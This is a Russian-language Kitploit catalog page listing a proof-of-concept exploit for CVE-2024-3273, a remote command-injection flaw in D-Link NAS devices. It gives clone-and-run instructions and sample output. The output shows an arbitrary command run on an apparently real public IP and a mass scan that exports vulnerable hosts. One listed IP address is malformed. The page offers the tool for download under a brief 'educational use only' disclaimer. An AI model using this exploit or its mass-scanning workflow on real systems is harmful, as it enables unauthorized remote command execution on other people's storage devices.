Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-3273 — Эксплойт для CVE-2024-3273, поддерживает одиночные и множественные хосты. | Kitploit
Инструменты/GitHubGitHub/adhikara13/cve-2024-3273
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

Эксплойт для CVE-2024-3273, поддерживает одиночные и множественные хосты.

Репозиторий
13112 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-3273 — доказательство концепции (PoC)

Этот репозиторий содержит доказательство концепции (PoC) для CVE-2024-3273, уязвимости безопасности, обнаруженной в устройствах D-Link NAS. Уязвимость позволяет атакующим выполнять произвольные команды на уязвимых устройствах.

Описание

CVE-2024-3273 — это уязвимость в устройствах D-Link NAS, которая позволяет удаленным атакующим выполнять произвольные команды через специально сформированный HTTP-запрос к конечной точке cgi-bin/nas_sharing.cgi.

Этот PoC демонстрирует, как уязвимость может быть использована для выполнения команд на уязвимых устройствах D-Link NAS.

Требования

  • Python 3.x
  • библиотека requests

Использование

  1. Клонируйте этот репозиторий:

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. Перейдите в каталог репозитория:

    root@kitploit:~
    cd CVE-2024-3273
    
  • Запустите PoC:

    root@kitploit:~
    python main.py
    
  • Следуйте инструкциям на экране, чтобы выбрать целевое устройство:

    • Вариант 1: Одиночный хост (1): Введите данные для одного целевого устройства, включая IP-адрес хоста и команду для выполнения.
    • Вариант 2: Несколько хостов (2): Укажите файл, содержащий несколько целевых устройств в формате host:port, и выберите, экспортировать ли уязвимые хосты в vulnerables.txt.
  • Пример

    root@kitploit:~
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.
    

    Отказ от ответственности

    Этот PoC предназначен только для образовательных и исследовательских целей. Используйте его ответственно и только на устройствах, которые вы уполномочены тестировать.

    Вклад

    Приветствуются любые вклады! Если вы найдете какие-либо проблемы или улучшения, не стесняйтесь открыть issue или создать pull request.

    Скачать инструмент